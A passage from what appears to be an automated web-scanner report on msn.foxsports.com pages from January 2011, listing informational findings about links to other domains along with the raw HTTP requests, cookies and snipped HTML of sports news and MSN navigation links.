pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 42110
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fd156a;path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fc156a;path=/
Expires: Sat, 08 Jan 2011 01:13:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:13:37 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>


   
...[SNIP]...
</script>
   <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<br>&#8226;&nbsp;<a blurb="Wisconsin running back John Clay says he will enter the NFL draft." href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&feedID=5059">RB Clay, too</a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
</span> &nbsp;<a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">Privacy</a>
...[SNIP]...
<span class="last"><a href="http://g.msn.com/0nwenus0/AK/18" target="_blank">Terms of Use</a>
...[SNIP]...
<span class="first">Portions Copyright &#169; 2010 <a href="http://www.stats.com" target="_blank">STATS LLC</a>
...[SNIP]...

10.12. http://msn.foxsports.com/fantasy/football/frankspicks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/football/frankspicks/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fantasy/football/frankspicks/?nicmp=HPMKTMOD&nichn=FRANKSPICKS&niseg=LNK HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 24863
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKscdQt+GmTLC98LpZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl01_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/JQHBz5b08YY/jim-harbaugh-san-francisco-49ers-agree-to-coach-010711" target="_blank">Jim Harbaugh to be 49ers' next coach</a>
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl02_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/C4Z45yGK7N8/jim-harbaugh-san-francisco-49ers-agree-010711" target="_blank">Glazer: Harbaugh to 49ers</a>
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl03_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/bcCko-zeSrA/miami-dolphins-tony-sparano-jim-harbaugh-retain-head-coach-010611" target="_blank">Sources: Dolphins retain Sparano</a>
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl04_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/LXhuA5oTrFQ/NFL-coaches-hired-fired-interim-carousel-rumors-010211" target="_blank">2011 NFL coaching carousel</a>
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl05_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/tGHoZ9otzZc/Ravens-Ed-Reed-brother-wanted-by-police-010711" target="_blank">Police looking for Ed Reed's brother</a>
...[SNIP]...
<div>
               <a href="http://foxsports.seenon.com/?v=fox-sports_cleatus-robot&ecid=PRF-SM-500044&PA=FoxSportsNFLCleatus_300X100 " target="_blank" class="wis_cleatusPromo"></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li><a href="http://www.foxcareers.com" title="Jobs">Jobs</a>
...[SNIP]...
<li title=" Tickets"><a href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-1-2-0-0-0-0&amp;pid=foxsports'" title="Tickets">Tickets</a>
...[SNIP]...
<li><a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li><a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li><a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li><a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last"><a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
            <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js" language="javascript"></script>
...[SNIP]...
<noscript> <img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" style="display: none" width="0" height="0" alt="" /> </noscript>
...[SNIP]...
<li><a title="MSN Privacy" href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a title="Legal" href="http://g.msn.com/0TO_/enus" target="_blank">Legal</a>
...[SNIP]...
<li><a title="Advertise" href="http://advertising.msn.com/home/home.asp" target="_blank">Advertise</a>
...[SNIP]...
<li><a title="RSS" href="http://rss.msn.com/" target="_blank">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.13. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611?gt1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 235914
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=11
Date: Fri, 07 Jan 2011 21:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
